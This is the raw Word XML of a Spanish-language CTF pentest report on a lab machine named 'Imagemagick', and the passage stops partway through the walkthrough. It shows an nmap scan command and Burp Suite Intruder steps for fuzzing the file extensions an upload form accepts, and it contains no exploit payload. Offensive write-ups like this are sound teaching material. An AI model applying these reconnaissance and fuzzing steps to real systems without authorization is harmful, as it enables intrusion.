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2042" w14:textId="049E26EA" w:rsidR="008013F1" w:rsidRDefault="008013F1" w:rsidP="008013F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60756">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe Profesional - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008013F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Imagemagick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F9B51D3" w14:textId="2409B3B9" w:rsidR="008013F1" w:rsidRPr="00F60756" w:rsidRDefault="008013F1" w:rsidP="008013F1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Composer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="049F014B" w14:textId="77777777" w:rsidR="008013F1" w:rsidRDefault="008013F1" w:rsidP="008013F1"/>
    <w:p w14:paraId="6301549D" w14:textId="77777777" w:rsidR="008013F1" w:rsidRPr="00F60756" w:rsidRDefault="008013F1" w:rsidP="008013F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F60756">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introducción:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4517F7FB" w14:textId="386A3594" w:rsidR="008013F1" w:rsidRDefault="008013F1" w:rsidP="008013F1">
      <w:r w:rsidRPr="00B56B3F">
        <w:t>El presente informe documenta el proceso de pentesting realizado en la máquina CTF "</w:t>
      </w:r>
      <w:r w:rsidRPr="008013F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008013F1">
        <w:t>Imagemagick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B56B3F">
        <w:t>", con el objetivo de obtener acceso no autorizado y privilegios root para obtener el control total de la misma. Se llevaron a cabo diversas actividades y pruebas de penetración para identificar vulnerabilidades y puntos débiles en la seguridad de la máquina. A continuación, se detallan los resultados obtenidos y las metodologías utilizadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4939074D" w14:textId="65AF6DC8" w:rsidR="005C6C98" w:rsidRDefault="005C6C98"/>
    <w:p w14:paraId="0836139B" w14:textId="77777777" w:rsidR="008F5CED" w:rsidRPr="008F5CED" w:rsidRDefault="008F5CED" w:rsidP="008F5CED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F5CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enumeración de servicios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9ACDF8" w14:textId="77777777" w:rsidR="008F5CED" w:rsidRPr="008F5CED" w:rsidRDefault="008F5CED" w:rsidP="008F5CED">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F5CED">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Se realizó un escaneo de puertos utilizando la herramienta Nmap, obteniendo los siguientes resultados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085CD5A3" w14:textId="77777777" w:rsidR="008F5CED" w:rsidRPr="008F5CED" w:rsidRDefault="008F5CED" w:rsidP="008F5CED">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F5CED">
        <w:t>8080/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F5CED">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F5CED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F5CED">
        <w:t>filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F5CED">
        <w:t xml:space="preserve"> http-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E9442" w14:textId="77777777" w:rsidR="008F5CED" w:rsidRPr="008F5CED" w:rsidRDefault="008F5CED" w:rsidP="008F5CED">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CC5738" w14:textId="6C9417AA" w:rsidR="008F5CED" w:rsidRPr="008F5CED" w:rsidRDefault="008F5CED" w:rsidP="008F5CED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F5CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673AC69A" w14:textId="77777777" w:rsidR="008F5CED" w:rsidRPr="002267D8" w:rsidRDefault="008F5CED" w:rsidP="008F5CED">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002267D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002267D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002267D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002267D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002267D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A78F6E" w14:textId="77777777" w:rsidR="008F5CED" w:rsidRDefault="008F5CED"/>
    <w:p w14:paraId="4353B6A3" w14:textId="423411FD" w:rsidR="008F5CED" w:rsidRDefault="008F5CED" w:rsidP="008F5CED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F5CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Pagina Web en el Puerto 8080</w:t>
      </w:r>
      <w:r w:rsidRPr="008F5CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D957041" w14:textId="2FBD6B2E" w:rsidR="008F5CED" w:rsidRDefault="00B635E2" w:rsidP="00B635E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B635E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hemos revisado la página web y encontramos una funcionalidad que permite cargar archivos. Si bien esta característica podría representar una potencial vulnerabilidad, es importante tener en cuenta que cualquier intento de aprovecharla con fines no autorizados sería una práctica irresponsable y potencialmente ilegal. En lugar de realizar acciones inapropiadas, nos enfocamos en analizar cuidadosamente esta funcionalidad para comprender sus posibles riesgos de seguridad y recomendar soluciones adecuadas para fortalecer la protección del sistema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690757B" w14:textId="77777777" w:rsidR="00537B34" w:rsidRDefault="00537B34" w:rsidP="00B635E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04D8C2D3" w14:textId="2B40E6D3" w:rsidR="00B635E2" w:rsidRDefault="00B635E2" w:rsidP="00B635E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo primero que hacemos es con la herramienta de burpsuite obtener el flujo de la solicitud y configurar para ver que tipos de archivo acepta la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pagina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para realizar dicho trabajo tenemos que configurar el burpsuite y el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>foxyproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el puerto 8081 ya que la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>maquina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que estamos utilizando es mediante Docker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>composer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> el cual se esta ejecutando en el puerto 8080. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098FD2DA" w14:textId="79E42F54" w:rsidR="00B635E2" w:rsidRDefault="00B635E2" w:rsidP="00B635E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Una vez configurado el burpsuite y el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FoxyProxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> subimos un archivo .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> como ejemplo para obtener los registros en burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B884A1B" w14:textId="154DA7BA" w:rsidR="00B635E2" w:rsidRDefault="00B635E2" w:rsidP="00B635E2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2851AD" wp14:editId="45967CFC">
            <wp:extent cx="5612130" cy="2390140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="266823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23797" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5612130" cy="2390140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="340EAB39" w14:textId="028A8C63" w:rsidR="00B635E2" w:rsidRDefault="00537B34" w:rsidP="00B635E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mandamos la solicitud al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y damos enviar para ver la respuesta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB14A4F" w14:textId="4D5288E7" w:rsidR="00537B34" w:rsidRDefault="00537B34" w:rsidP="00537B34">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="725ADC75" wp14:editId="51AD8592">
            <wp:extent cx="5612130" cy="2757170"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5080"/>
            <wp:docPr id="2111261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61912" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5612130" cy="2757170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1571ECF0" w14:textId="38DA29DA" w:rsidR="00537B34" w:rsidRDefault="00537B34" w:rsidP="00537B34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Podemos ver que la pagina web no acepta archivos con extensión .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> por el cual tenemos que realizar un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fuzzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para averiguar que tipo de archivos acepta la pagina web.</w:t>
      </w:r>
      <w:r w:rsidR="00717A5A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Entonces mandamos la solicitud al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00717A5A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>intruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00717A5A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para realizar un ataque de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00717A5A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>snniper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00717A5A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para averiguar la extensión de archivos que acepta la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00717A5A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pagina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00717A5A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, para ello tenemos que configurar que en la extensión del archivo quede de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031ED866" w14:textId="18E22A91" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00537B34">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>file.$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19853589" w14:textId="5E294B1E" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00537B34">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7133B27C" wp14:editId="75C5C9D9">
            <wp:extent cx="5612130" cy="2730500"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2013328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28353" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5612130" cy="2730500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD254B" w14:textId="7A84078A" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Despues</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> nos vamos a la pestaña de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y en la sección </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Settings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> colocamos la lista de extensiones </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B43B58" w14:textId="469D9399" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="263437A4" wp14:editId="73AD2F99">
            <wp:extent cx="5612130" cy="2750820"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="887389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89054" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5612130" cy="2750820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA7CE2" w14:textId="39CA5B08" w:rsidR="00717A5A" w:rsidRDefault="00717A5A" w:rsidP="00717A5A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Luego en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>settings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> buscamos la sección de grep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>extract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> y le damos en el botón </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> se nos abrirá una ventana en el cual damos al botón </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>refetch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> response y nos saldrá el resultado que obtuvimos en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
